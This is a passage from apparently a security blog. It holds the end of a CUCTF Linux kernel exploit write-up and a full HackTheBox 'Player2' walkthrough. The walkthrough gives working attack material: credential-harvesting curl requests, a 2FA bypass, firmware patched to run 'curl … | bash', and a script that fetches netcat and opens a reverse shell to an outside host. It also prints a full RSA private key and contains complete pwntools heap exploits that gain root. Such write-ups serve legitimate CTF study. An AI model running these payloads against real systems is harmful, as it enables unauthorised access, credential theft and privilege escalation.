Due to our structure size, many of the common structures can't be used. However, timerfd_ctx can be quite a useful struct; we can allocate it with a timerfd_create() with the CLOCK_REALTIME option (other options will also work) and a timerfd_settime() call. Using this structure, we can both get a leak and control RIP via the location that stores the function pointer to timerfd_tmrproc(). The function pointer executes after a certain time period which you can control in the itimerspec struct. This structure has been documented before in both ptr-yudai's article about useful kernel structures, this paper about exploitable structures, and GNote from TokyoWesterns 2019. Note that for me, any subsequent sleep calls with the corrupted structure would fail, so I hung the thread to wait for the function pointer to trigger with a getchar().

Since the kernel randomizes freelist, I had to spray these structs in the same kmalloc slabs. Then, I freed the last sprayed chunk and immediately made hotrod allocate data there (as this free one chunk and re-allocate didn't seem to be affected by freelist randomization) for us to grab the leak reliably; otherwise, where our hotrod allocates might not be over a timerfd_ctx struct.

With the KASLR leak, we can rebase the entire kernel relative to startup_64 symbol in kallsyms and then use the aforementioned race to change the function pointer to a stack pivot gadget; we can pivot it to a userspace stack as there is no SMAP. Note that you need to specify a valid range for ropper/ROPGadget to search for gadgets; otherwise, it'll find gadgets that aren't in executable sections in the kernel. Take a look at the example below:

Since there is KPTI and SMEP, the traditional SMEP bypass of changing the CR4 register won't work; KPTI fully isolates user page tables from kernel page tables by managing the two sets via the 12th bit of the CR3 register (the userspace portion of kernel page tables is set to NX, and the only additional information given to userspace page tables is the information necessary to enter and exit the kernel). Instead, it is better to rely on a kpti trampoline and have it fix the CR3 for us so we can go back (swapgs_restore_regs_and_return_to_usermode); these functionalities exist in the kernel because it needs to handle this for routines like syscalls. I usually add +0x16 to where this is located, just so I can skip all the initial pops and start right at movq %rsp, %rdi. Using this trampoline combined with a commit_creds(init_cred) to change my uid to 0 beforehand, I can then choose whichever function to return to in my userspace code with root privileges. Of course, I needed to specify the cs, ss, r_flags, and stack (specifically, at that location, it expects RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS) for the trampoline to return to as well; I just used the values I saved beforehand in the userspace process.

In my case, I was not able to execve or perform many other functions without causing a kernel panic, so I ended up doing open read write in my function. I also had to just halt the OS; otherwise, the kernel panics on the return, hangs, and then somehow spikes my CPU usage to 100%. I'm not too sure why that happened, so if you know why, please let me know.

Below is my exploit with comments and linked resources:


To transfer the exploit to the remote instance, I just compiled it statically with gcc, gzip'd it, and then transfered with base64 encoding and cat > exploit << EOF. It was still relatively large and took about 7 minutes to transfer, but if one really was working under time constraints, compiling with a more minimalistic library like musl or uclibc could help. Here's the final result:

On a sidenote, one of my testers and teammate D3v17 did manage to pop a shell by changing modprobe_path and then hanging the kernel thread with a int3 instruction when going back to userspace; then he can still run commands as root with the classic modprobe trick. However, this only had a 1 in 5 success rate, and can become an issue during a CTF because of the long transfer times.

If I made any mistakes in my explanations above, feel free to let me know so I can correct them. I'm still continuing to study the Linux kernel and find it quite fascinating! Thanks again to CUCTF for hosting the event!

For those interested in trying this problem out, it is archived in the CUCTF repos.

Saturday, June 27, 2020

Player2 HacktheBox Writeup


Player2 was a challenging but very fun box by MrR3boot and b14ckh34rt. The highlight of the box for me is the finale 2.29 heap pwn!  In my opinion, if there were no unintended routes, this would have been by far the hardest box so far, but some of these alternative solutions were never patched.

On the intial enum, we find on player2.htb a link to product.player2.htb regarding the Protobs product.  It's a login page, so it's time to hopefully find some creds.  On an initial nmap port scan, we also find the following ports: 22, 80, 8545.  Going to port 8545, we see an invalid twirp route message, giving away the fact that twirp is used on this box. While dirbing player2.htb, we also come across the proto directory.  Documentation at this point basically told me what to do:

https://twitchtv.github.io/twirp/docs/curl.html
https://github.com/twitchtv/twirp/blob/master/docs/routing.md

From the proto directory, let's try to find some configuration info by fuzzing for the .proto file.  Using some different wordlists with wfuzz on /proto/FUZZ.proto, I came across generated.proto:

syntax = "proto3";

package twirp.player2.auth;
option go_package = "auth";

service Auth {
  rpc GenCreds(Number) returns (Creds);
}

message Number {
  int32 count = 1; // must be > 0
}

message Creds {
  int32 count = 1;
  string name = 2;
  string pass = 3;
}

Note how twirp documentation mentions the route as the following:

POST /twirp/<package>.<Service>/<Method>

From the source above, the route will be twirp.player2.auth.Auth/GenCreds... some nice credentials should come from here!

Using the twirp documentation with curl, I played around and curled to the service route based on the format from the documentation.

curl -X POST "http://player2.htb:8545/twirp/twirp.player2.auth.Auth/GenCreds" --header "Content-Type:application/json" --data '{}'

However, we end up getting a lot of different creds and most of them don't work.  I recieved the following:
{"name":"snowscan","pass":"Lp-+Q8umLW5*7qkc"}
{"name":"snowscan","pass":"ze+EKe-SGF^5uZQX"}
{"name":"jkr","pass":"tR@dQnwnZEk95*6#"}
{"name":"mprox","pass":"ze+EKe-SGF^5uZQX"}
{"name":"jkr","pass":"XHq7_WJTA?QD_?E2"}

With some different varaitions, I determined that the following worked:
jkr:Lp-+Q8umLW5*7qkc

However, once we login, it asks for OTP.  It tells us that we can either use the OTP that was sent to mobile or backup codes.  I did notice an initial api link from dirb originally.  This page is called totp, which is a type of otp.  Thinking logically, plugging in /api/totp actually worked.  It also mentioned backup codes.  Playing around, there seems to be “action” parameter on the api.  After a while, I figured out that sending in the logged in session id along with a request for “backup_codes” (a logical name for what we are looking for) gave us the TOTP. 

curl -X POST "http://product.player2.htb/api/totp" --header "Content-Type:application/json" -d '{"action":"backup_codes"}' --cookie "PHPSESSID=06plq8egcf5e8eijvhs8abjs7q"

{"user":"jkr","code":"29389234823423"}

After rooting the box, hevr pointed out that there should be a type juggling attack here as the 2FA bypass:

curl -X POST "http://product.player2.htb/api/totp" --header "Content-Type:application/json" -d '{"action":0}' --cookie "PHPSESSID=06plq8egcf5e8eijvhs8abjs7q"

Inside the following page, we see a mention to a pdf and a link to a firmware download.  It mentions that the firmware is signed.  Extracting the binary file from the tar, I opened it up in a hex editor and saw the ELF header appear 64 bytes into the file.  It seems safe here to assume that the first 64 bytes is probably the signature.  Let's take out the first 64 bytes: dd if=Protobs.bin bs=64 skip=1 of=firmware.

While reversing it, I noticed how the main function called another function, which in turn called system on a string.

0x004013c9      55             push rbp
|           0x004013ca      4889e5         mov rbp, rsp
|           0x004013cd      4883ec10       sub rsp, 0x10
|           0x004013d1      64488b042528.  mov rax, qword fs:[0x28]    ; [0x28:8]=-1 ; '(' ; 40
|           0x004013da      488945f8       mov qword [local_8h], rax
|           0x004013de      31c0           xor eax, eax
|           0x004013e0      488d3dbd0c00.  lea rdi, qword str.stty_raw__echo_min_0_time_10 ; 0x4020a4 ;
 "stty raw -echo min 0 time 10"
|           0x004013e7      e884fcffff     call sym.imp.system         ; int system(const char *string)
|           0x004013ec      e8bffcffff     call sym.imp.getchar        ; int getchar(void)
|           0x004013f1      8945f4         mov dword [local_ch], eax
|           0x004013f4      837df41b       cmp dword [local_ch], 0x1b
|       ,=< 0x004013f8      7416           je 0x401410
|       |   0x004013fa      488d3dc00c00.  lea rdi, qword str.stty_sane ; 0x4020c1 ; "stty sane"
|       |   0x00401401      e86afcffff     call sym.imp.system         ; int system(const char *string)
|       |   0x00401406      bf00000000     mov edi, 0
|       |   0x0040140b      e8c0fcffff     call sym.imp.exit

We can patch binaries with dd to call system on a different string and then reattach the 64 byte signature:

First, finding the offset to the first string with stty.
strings -t d Protobs.bin | grep stty

Then, I created a “malicious” file for the next dd to transfer into and replace the string.  It contained the following contents:
curl 10.10.14.7/z | bash

The “z” on my side is just a shellscript containing the following:
curl http://10.10.14.7/nc -o /tmp/nc
chmod +x /tmp/nc
/tmp/nc 10.10.14.7 1337 -e /bin/sh

The reason I kept the original command so small was because I was being cautious about messing up the binary with a string that is too long.

Then, lastly, with the final patching:
dd if=malicious of=Protobs.bin obs=1 seek=8420 conv=notrunc

Uploading this should pop us a shell back as www-data.
Looking in /etc/passwd, there are two potential users to go for: egre55 and observer.  I also noticed that there is an account for the mosquitto service.  The service is also running on port 1883.  Reading around, the SYS-topic part of it was quite interesting.

To quote the article, SYS topics are a special class of topics under which the broker publishes data, typically for monitoring purposes. SYS topics are not a formal standard but are an established practice in MQTT brokers.

Going to it with the following command:
mosquitto_sub -h localhost -p 1883 -v -t '$SYS/#'

We end up seeing an SSH key getting dumped after a while:

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA7Gc/OjpFFvefFrbuO64wF8sNMy+/7miymSZsEI+y4pQyEUBA
R0JyfLk8f0SoriYk0clR/JmY+4mK0s7+FtPcmsvYgReiqmgESc/brt3hDGBuVUr4
et8twwy77KkjypPy4yB0ecQhXgtJNEcEFUj9DrOq70b3HKlfu4WzGwMpOsAAdeFT
+kXUsGy+Cp9rp3gS3qZ2UGUMsqcxCcKhn92azjFoZFMCP8g4bBXUgGp4CmFOtdvz
SM29st5P4Wqn0bHxupZ0ht8g30TJd7FNYRcQ7/wGzjvJzVBywCxirkhPnv8sQmdE
+UAakPZsfw16u5dDbz9JElNbBTvwO9chpYIs0QIDAQABAoIBAA5uqzSB1C/3xBWd
62NnWfZJ5i9mzd/fMnAZIWXNcA1XIMte0c3H57dnk6LtbSLcn0jTcpbqRaWtmvUN
wANiwcgNg9U1vS+MFB7xeqbtUszvoizA2/ScZW3P/DURimbWq3BkTdgVOjhElh6D
62LlRtW78EaVXYa5bGfFXM7cXYsBibg1+HOLon3Lrq42j1qTJHH/oDbZzAHTo6IO
91TvZVnms2fGYTdATIestpIRkfKr7lPkIAPsU7AeI5iAi1442Xv1NvGG5WPhNTFC
gw4R0V+96fOtYrqDaLiBeJTMRYp/eqYHXg4wyF9ZEfRhFFOrbLUHtUIvkFI0Ya/Y
QACn17UCgYEA/eI6xY4GwKxV1CvghL+aYBmqpD84FPXLzyEoofxctQwcLyqc5k5f
llga+8yZZyeWB/rWmOLSmT/41Z0j6an0bLPe0l9okX4j8WOSmO6TisD4WiFjdAos
JqiQej4Jch4fTJGegctyaOwsIVvP+hKRvYIwO9CKsaAgOQySlxQBOwMCgYEA7l+3
JloRxnCYYv+eO94sNJWAxAYrcPKP6nhFc2ReZEyrPxTezbbUlpAHf+gVJNVdetMt
ioLhQPUNCb3mpaoP0mUtTmpmkcLbi3W25xXfgTiX8e6ZWUmw+6t2uknttjti97dP
QFwjZX6QPZu4ToNJczathY2+hREdxR5hR6WrJpsCgYEApmNIz0ZoiIepbHchGv8T
pp3Lpv9DuwDoBKSfo6HoBEOeiQ7ta0a8AKVXceTCOMfJ3Qr475PgH828QAtPiQj4
hvFPPCKJPqkj10TBw/a/vXUAjtlI+7ja/K8GmQblW+P/8UeSUVBLeBYoSeiJIkRf
PYsAH4NqEkV2OM1TmS3kLI8CgYBne7AD+0gKMOlG2Re1f88LCPg8oT0MrJDjxlDI
NoNv4YTaPtI21i9WKbLHyVYchnAtmS4FGqp1S6zcVM+jjb+OpBPWHgTnNIOg+Hpt
uaYs8AeupNl31LD7oMVLPDrxSLi/N5o1I4rOTfKKfGa31vD1DoCoIQ/brsGQyI6M
zxQNDwKBgQCBOLY8aLyv/Hi0l1Ve8Fur5bLQ4BwimY3TsJTFFwU4IDFQY78AczkK
/1i6dn3iKSmL75aVKgQ5pJHkPYiTWTRq2a/y8g/leCrvPDM19KB5Zr0Z1tCw5XCz
iZHQGq04r9PMTAFTmaQfMzDy1Hfo8kZ/2y5+2+lC7wIlFMyYze8n8g==
-----END RSA PRIVATE KEY-----


Testing it on the two possible users, it turned out that it works for observer.  And now user has been pwned!  

Finally, we have hit the part for root.  It's a poison null byte on 2.29 (there also was an easier heap overflow unintended).  Anyways, make sure to read up on libc malloc.c for 2.29 on bminor's mirror of libc source before continuing!  The binary can be found in /opt/Configuration_Utility, and running checksec on it immediately informs us that it is patchelf'd to run ld and libc different from the box's libc and ld.  Personally, I like to use all of pwndbg's capabilities with libc debug symbols, so I ran the following commands to switch the interpreter and rpath to default and debugged on a headless ubuntu VM running the same libc version:

patchelf Protobs --set-interpreter /lib64/ld-linux-x86-64.so.2
patchelf Protobs --remove-rpath /lib/x86_64-linux-gnu/

Anyways, let us begin the pwning!  Here is the binary reversed with my comments.


//only 15 indices

typedef struct
{
  char[20] game;
  unsigned int contrast;
  unsigned int gamma;
  unsigned int xres;
  unsigned int yres;
  unsigned int controller;
  unsigned int desc;
  char *description;
}gamestruct;

void create(void)
{
  char *__dest;
  long lVar1;
  int iVar2;
  undefined4 uVar3;
  void *pvVar4;
  ssize_t sVar5;
  size_t sVar6;
  long in_FS_OFFSET;
  int local_448;
  char local_428 [19];
  undefined local_415;
  long local_20;
  
  local_20 = *(long *)(in_FS_OFFSET + 0x28);
  iVar2 = FUN_00400c8b();
  if (iVar2 < 0) {
    FUN_00400c3e();
  }
  pvVar4 = malloc(0x38); //so default, allocate to 0x40 tcachebin, note libc 2.29
  *(void **)(&DAT_00603060 + (long)iVar2 * 8) = pvVar4;
  __dest = *(char **)(&DAT_00603060 + (long)iVar2 * 8);
  putchar(10);
  puts("==New Game Configuration");
  printf(" [ Game                ]: ");
  fgets(local_428,0x400,stdin);
  readin(local_428);
  local_415 = 0;
  strncpy(__dest,local_428,0x14);
  uVar3 = readnum(" [ Contrast            ]: ");
  *(undefined4 *)(__dest + 0x14) = uVar3;
  uVar3 = readnum(" [ Gamma               ]: ");
  *(undefined4 *)(__dest + 0x18) = uVar3;
  uVar3 = readnum(" [ Resolution X-Axis   ]: ");
  *(undefined4 *)(__dest + 0x1c) = uVar3;
  uVar3 = readnum(" [ Resolution Y-Axis   ]: ");
  *(undefined4 *)(__dest + 0x20) = uVar3;
  uVar3 = readnum(" [ Controller          ]: ");
  *(undefined4 *)(__dest + 0x24) = uVar3;
  uVar3 = readnum(" [ Size of Description ]: "); //not nulled out another bug here!
  *(undefined4 *)(__dest + 0x28) = uVar3;
  if (*(int *)(__dest + 0x28) != 0) {
    printf(" [ Description         ]: ");
    sVar5 = read(0,local_428,0x200);
    readin(local_428);
    if (*(uint *)(__dest + 0x28) <= (uint)sVar5) {
      local_428[(ulong)*(uint *)(__dest + 0x28)] = 0;
    }
    pvVar4 = malloc((ulong)*(uint *)(__dest + 0x28));
    *(void **)(__dest + 0x30) = pvVar4; //another allocation
    lVar1 = *(long *)(__dest + 0x30);
    local_448 = 0;
    while( true ) {
      sVar6 = strlen(local_428); //counts all the way till null byte
      //what happenned above allows for poison null byte, it's copying strlen bytes rather than desc size bytes
      if (sVar6 < (ulong)(long)local_448) break;
      *(char *)((long)local_448 + lVar1) = local_428[(long)local_448];
      local_448 = local_448 + 1;
    }
  }
  putchar(10);
  if (local_20 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}



void delete(void)
{
  long lVar1;
  void *__ptr;
  uint uVar2;
  long in_FS_OFFSET;
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  putchar(10);
  puts("==Delete Game Configuration");
  puts(" >>> Run the list option to see available configurations.");
  uVar2 = readnum(" [ Config Index    ]: ");
  if ((uVar2 < 0xf) && (*(long *)(&DAT_00603060 + (ulong)uVar2 * 8) != 0)) {
    __ptr = *(void **)(&DAT_00603060 + (ulong)uVar2 * 8);
    if (*(long *)((long)__ptr + 0x30) != 0) {
      free(*(void **)((long)__ptr + 0x30)); 
    }
    free(__ptr);
    *(undefined8 *)(&DAT_00603060 + (ulong)uVar2 * 8) = 0; 
  }
  else {
    puts("  [!] Invalid index.");
  }
  putchar(10);
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}


void readin(char *pcParm1)
{
  long lVar1;
  char *pcVar2;
  long in_FS_OFFSET;
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  pcVar2 = strchr(pcParm1,0xd);
  if (pcVar2 != (char *)0x0) {
    *pcVar2 = 0;
  }
  pcVar2 = strchr(pcParm1,10);
  if (pcVar2 != (char *)0x0) {
    *pcVar2 = 0;
  }
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}


ulong readnum(char *pcParm1)
{
  ulong uVar1;
  long in_FS_OFFSET;
  char local_28 [24];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  printf(pcParm1);
  fgets(local_28,0x10,stdin);
  uVar1 = strtol(local_28,(char **)0x0,10);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return uVar1 & 0xffffffff;
}



void show(void)
{
  long lVar1;
  long lVar2;
  uint uVar3;
  long in_FS_OFFSET;
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  putchar(10);
  puts("==Read Game Configuration");
  puts(" >>> Run the list option to see available configurations.");
  uVar3 = readnum(" [ Config Index    ]: ");
  if ((uVar3 < 0xf) && (*(long *)(&DAT_00603060 + (ulong)uVar3 * 8) != 0)) {
    lVar2 = *(long *)(&DAT_00603060 + (ulong)uVar3 * 8);
    printf("  [ Game                ]: %s\n",lVar2);
    printf("  [ Contrast            ]: %u\n",(ulong)*(uint *)(lVar2 + 0x14));
    printf("  [ Gamma               ]: %u\n",(ulong)*(uint *)(lVar2 + 0x18));
    printf("  [ Resolution X-Axis   ]: %u\n",(ulong)*(uint *)(lVar2 + 0x1c));
    printf("  [ Resolution Y-Axis   ]: %u\n",(ulong)*(uint *)(lVar2 + 0x20));
    printf("  [ Controller          ]: %u\n",(ulong)*(uint *)(lVar2 + 0x24));
    if (*(long *)(lVar2 + 0x30) != 0) {
      printf("  [ Description         ]: %s\n",*(undefined8 *)(lVar2 + 0x30));
    }
  }
  else {
    puts("  [!] Invalid index.");
  }
  putchar(10);
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}



void list(void)
{
  long lVar1;
  long in_FS_OFFSET;
  uint local_1c;
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  putchar(10);
  puts("==List of Configurations");
  local_1c = 0;
  while (local_1c < 0xf) {
    if (*(long *)(&DAT_00603060 + (ulong)local_1c * 8) != 0) {
      printf(" [%02u] : %s\n",(ulong)local_1c,*(undefined8 *)(&DAT_00603060 + (ulong)local_1c *8));
    }
    local_1c = local_1c + 1;
  }
  putchar(10);
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;

void main(void)
{
  long in_FS_OFFSET;
  char local_28 [24];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  printf("protobs@player2:~$ ");
  fgets(local_28,0x10,stdin);
  switch(local_28[0]) {
  case '0':
    help();
    break;
  case '1':
    list();
    break;
  case '2':
    create();
    break;
  case '3':
    show();
    break;
  case '4':
    delete();
    break;
  case '5':
    FUN_00400be7();
    break;
  default:
    putchar(10);
    puts("[!] Invalid option. Enter \'0\' for available options.");
    putchar(10);
  }
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
    return;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

Basically, there are two bugs, a poison null byte and a UAF.  UAF comes from the fact that the game struct, which belongs to the 0x40 tcache bin due to 0x38 allocations, does not zero out the pointer to description when freed.  Therefore, we can make a game with a description, free it, get the same game chunk back with another allocation, and get the same description by just setting the size as 0 as the pointer will remain the same.  And in the alloc function, there is also a poison null byte due to the way it read in our description from how it indexes to attach the null byte (note the bug there).  Using the UAF, we can grab both a heap and libc leak.  Heap leak can be grabbed from tcache bin pointers.  Libc leak can be grabbed from unsorted bin pointers, which can easily be done since there is no limit to how big we allocate, so we can just allocate some bins in the largebin size area to fall into unsorted bin. 

As for the poison null byte, it's a similar concept as older poison null bytes.  Only difference is that in libc 2.29, there is the following check:

    if (!prev_inuse(p)) {
      prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      if (__glibc_unlikely (chunksize(p) != prevsize))
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
      unlink_chunk (av, p);
    }

Bypassing this isn't too hard.  Just forge a fake chunk right above the region you want to coalesce with the correct size (remember the prev_size issue too in poison null bytes; that prev_size determines where it is going to check and how much it will coalesce by!).  However, you will also need some heap pointers to point back to the location of the forged chunk to bypass a more classic heap fd->bk =P and bk->fd =P unlink macro check. 

Below is the unlink macro:

#define unlink(AV, P, BK, FD) {                                            \
   if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
     malloc_printerr ("corrupted size vs. prev_size");                  \
   FD = P->fd;                                      \
   BK = P->bk;                                      \
   if (__builtin_expect (FD->bk != P || BK->fd != P, 0))              \
     malloc_printerr ("corrupted double-linked list");                  \
   else {                                      \
       FD->bk = BK;                                  \
BK->fd = FD; 

Somehow I missed the really obvious massive heap overflow above from the buffer issue, as sampriti, R4J, and hevr pointed out.  Notice how the buffer for the name and the desc are on the same place on the stack, but the fgets for the name allows for a lot more space on the buffer (0x400) while the read for the heap is capped at 0x200.  We can simply fill the amount of the heap buffer all the way and also do something similar for name originally... copying using strlen will copy everything over, allowing for a massive heap overflow, and doing the rest of the classic heap stuff with tcache to probably get arbitrary write.  This method of exploitation would have been much simpler.

Anyways, afterwards, you should be able to coalesce, get heap overlap, and pop a shell.  Now let's write the exploit.  Make sure to debug along if you were not able to solve this!

First thing I do is write all the helper functions.  

from pwn import *

#context.log_level = 'debug'
#no pie
bin = ELF('./Protobs')
libc = ELF('./libc.so.6')

p = process('./Protobs')

#it's suid so life becomes even easier!
#bss at 0x603060
def wait():
    p.recvrepeat(0.1)

def alloc(size, desc, game='', contrast=0,gamma=0,xres=0,yres=0,controller=0):
    p.sendline('2')
    wait()
    p.sendline(game)
    wait()
    p.sendline(str(contrast))
    wait()
    p.sendline(str(gamma))
    wait()
    p.sendline(str(xres))
    wait()
    p.sendline(str(yres))
    wait()
    p.sendline(str(controller))
    wait()
    p.sendline(str(size))
    wait()
    if size is not 0:
        p.sendline(desc)
        wait()


def free(index):
    p.sendline('4')
    wait()
    p.sendline(str(index))
    wait()

def show(index):
    p.sendline('3')
    wait()
    p.sendline(str(index))

Then I got a heap and libc leak using the UAF bug above.  It is important to keep track of how many tcachebins you have left in the 0x40 and try to keep it filled up, especially before the poison null byte, so they do not interfere with your poison null byte setup.  Hopefully, my comments below will help clear up any confusion.

small = 0x198
big = 0x4f0 #500
p.recvrepeat(2)
wait()
#fill with 6 tcache bins
for i in range(3):
    alloc(0x30, 'A' * 0x20)
for i in range(3): 
    free(i) #6 chunks in tcache
alloc(0, 'blah') 
show(0) #5 chunks in tcache
p.recvuntil('[ Description         ]: ')
heapleak = p.recvline()[:-1]
heapleak = u64(heapleak.ljust(8, '\x00'))
log.info('Heap leak: ' + hex(heapleak)) 
alloc(0x500, 'A' * 0x30) #4 chunks in tcache
alloc(0x200, 'A' * 0x30) #3 chunks in tcache, chunk index 2
free(2) #prevent top consolidation, back to 4 chunks in tcache
free(1) #for libc leaking, 5 chunks in tcache
alloc(0, 'blah') #4 chunks in tcache, chunk 1
show(1) #1 is taken up
p.recvuntil('[ Description         ]: ')
libcleak = p.recvline()[:-1]
libcleak = u64(libcleak.ljust(8, '\x00'))
libc.address = libcleak -  0x1e4c40 - 96
log.info("Libc Base: " + hex(libc.address)) 

As I mentioned earlier, I would prefer to have all the tcachebins for the game metadata structs filled so they do not interfere with my poison null byte setup.

#fill rest of tcache
for i in range(4):
    alloc(0x200, 'A' * 0x20) #2, 3, 4, 5
#empty it
for i in range(3):
    alloc(0, '') #6, 7, 8
for i in range(7):
    free(i+2)
 #7 chunks in 0x40 tcache
#tcache should be filled now

Now it's time for the poison null byte.  Just remember what I said before and you should be fine.  There is however one thing to note, and it's the size I chose to overwrite.  I allocated 0x4f0 for it so it becomes 0x500.  Not only do I avoid having to fill tcachebin for it before it does the coalesce/unsorted mechanism, but when I overwrite it, it will become 0x501 (prev in use is on) to 0x500.  This way, I won't have to deal with the libc checks that check the chunks afterwards as the size did not actually change.  Also, you will need to slowly write the poison null bytes by writing backwards byte by byte due to the way it transfers the data from the buffer to the heap in the allocation function.  You will also need to make sure you have a freed chunk in that coaelesced region to create heap overlap afterwards.

#now time for poison null byte
alloc(0x50, 'C' * 0x38 + p64(heapleak+0xa50)) #2
#wipe out null bytes to set up forged chunk correctly
for i in range(6):
    free(2)
    alloc(0x50, 'C' * (0x38-i-1))
free(2) #continue setting up forged chunk
alloc(0x50, 'C' * 0x30 + p64(heapleak+0xa50))
for i in range(6):
    free(2)
    alloc(0x50, 'C' * (0x30-i-1))
free(2)
alloc(0x50, 'C' * 0x28 + p64(small+0x38)) #2
#forged chunk should be good to go

alloc(small, 'D' * 0x100) #3
alloc(big, 'E' * 0x100) #4
alloc(0x210, '') #prevent top consolidation #5
free(3)
alloc(small, 'F' * (small)) #poison null byte
#set up fake prev_size
free(3)
for i in range(6):
    alloc(small, 'F' * (small-i-1))
    free(3)
alloc(small, 'F'*(small-0x8)+p64(small+0x38))
free(3)
free(4) #chunk coaelesced now

Now you have coalesced region with a free chunk pointing to the same region, thereby creating heap overlap.  Technically, tcache poison by overwriting the fd pointers is very trivial, but beware the tcache count check.  This can be handled by allocating several tcache bins of the same size and then putting them all in the respective tcache bins, so when you poison the tcache bins, you will have enough for tcache counts to not worry about it becoming -1 and thus not giving the target region back.  Then overwrite free hook with system and pop a shell with a string since you control the rdi value for free.

alloc(0x20, 'temp') 
alloc(0x20, 'ZZZZ') 
alloc(0x60, 'Y' * 0x20) #6
alloc(0x60, 'Y'*0x20) #so tcache count doesn't drop, bypass that check
alloc(0x60, 'Y' * 0x20)
free(6)
free(7)
free(8)
alloc(small, 'A' * (0x60 + 0x70 + 0x10) + p64(libc.symbols['__free_hook'])) #overlapped chunks 
alloc(0x60, '')
#above was a tcache poison, now overwrite malloc hook
magic = [0xe237f, 0xe2383, 0xe2386]
alloc(0x60, p64(libc.symbols['system'])) #8, because it frees the desc first, we can't have it do that
alloc(0x300, '', game='/bin/bash\x00') #9
free(9)
p.interactive()

For remote version, I just used ssh from pwn tools and slowed down the timing.

from pwn import *

#context.log_level = 'debug'
#no pie
bin = ELF('./Protobs')
libc = ELF('./libc.so.6')


remoteShell = ssh(host = 'player2.htb', user='observer', keyfile='./key')
remoteShell.set_working_directory('/opt/Configuration_Utility')
p = remoteShell.process('./Protobs')

#it's suid so life becomes even easier!
#bss at 0x603060
def wait():
    p.recvrepeat(0.3)

def alloc(size, desc, game='', contrast=0,gamma=0,xres=0,yres=0,controller=0):
    p.sendline('2')
    wait()
    p.sendline(game)
    wait()
    p.sendline(str(contrast))
    wait()
    p.sendline(str(gamma))
    wait()
    p.sendline(str(xres))
    wait()
    p.sendline(str(yres))
    wait()
    p.sendline(str(controller))
    wait()
    p.sendline(str(size))
    wait()
    if size is not 0:
        p.sendline(desc)
        wait()


def free(index):
    p.sendline('4')
    wait()
    p.sendline(str(index))
    wait()

def show(index):
    p.sendline('3')
    wait()
    p.sendline(str(index))

small = 0x198
big = 0x4f0 #500
p.recvrepeat(2)
wait()
#fill with 6 tcache bins
for i in range(3):
    alloc(0x30, 'A' * 0x20)
for i in range(3): 
    free(i) #6 chunks in tcache
alloc(0, 'blah') 
show(0) #5 chunks in tcache
p.recvuntil('[ Description         ]: ')
heapleak = p.recvline()[:-1]
heapleak = u64(heapleak.ljust(8, '\x00'))
log.info('Heap leak: ' + hex(heapleak)) 
alloc(0x500, 'A' * 0x30) #4 chunks in tcache
alloc(0x200, 'A' * 0x30) #3 chunks in tcache, chunk index 2
free(2) #prevent top consolidation, back to 4 chunks in tcache
free(1) #for libc leaking, 5 chunk in tcache
alloc(0, 'blah') #4 chunks in tcache, chunk 1
show(1) #1 is taken up
p.recvuntil('[ Description         ]: ')
libcleak = p.recvline()[:-1]
libcleak = u64(libcleak.ljust(8, '\x00'))
libc.address = libcleak -  0x1e4c40 - 96
log.info("Libc Base: " + hex(libc.address)) #know that read maxes out at 0x200
#fill rest of tcache
for i in range(4):
    alloc(0x200, 'A' * 0x20) #2, 3, 4, 5
#empty it
for i in range(3):
    alloc(0, '') #6, 7, 8
for i in range(7):
    free(i+2)
 #7 chunks in 0x40 tcache
#tcache should be filled now
#now time for poison null byte
alloc(0x50, 'C' * 0x38 + p64(heapleak+0xa50)) #2
#wipe out null bytes to set up forged chunk correctly
for i in range(6):
    free(2)
    alloc(0x50, 'C' * (0x38-i-1))
free(2) #continue setting up forged chunk
alloc(0x50, 'C' * 0x30 + p64(heapleak+0xa50))
for i in range(6):
    free(2)
    alloc(0x50, 'C' * (0x30-i-1))
free(2)
alloc(0x50, 'C' * 0x28 + p64(small+0x38)) #2
#forged chunk should be good to go

alloc(small, 'D' * 0x100) #3
alloc(big, 'E' * 0x100) #4
alloc(0x210, '') #prevent top consolidation #5
free(3)
alloc(small, 'F' * (small)) #poison null byte
#set up fake prev_size
free(3)
for i in range(6):
    alloc(small, 'F' * (small-i-1))
    free(3)
alloc(small, 'F'*(small-0x8)+p64(small+0x38))
free(3)
free(4) #chunk coaelesced now
p.interactive()
alloc(0x20, 'temp') 
alloc(0x20, 'ZZZZ') 
alloc(0x60, 'Y' * 0x20) #6
alloc(0x60, 'Y'*0x20) #so tcache count doesn't drop, bypass that check
alloc(0x60, 'Y' * 0x20)
free(6)
free(7)
free(8)
alloc(small, 'A' * (0x60 + 0x70 + 0x10) + p64(libc.symbols['__free_hook'])) #overlapped chunks 
alloc(0x60, '')
magic = [0xe237f, 0xe2383, 0xe2386]
alloc(0x60, p64(libc.symbols['system'])) #8, because it frees the desc first, we can't have it do that
alloc(0x300, '', game='/bin/sh\x00') #9
free(9)
p.interactive()

And you should now have a root shell!  During this box's lifecycle, there were actually several other unintendeds and alternative methods that made this box easier, one of which was the large heap overflow I mentioned above, which could make tcache poisoning trivial.

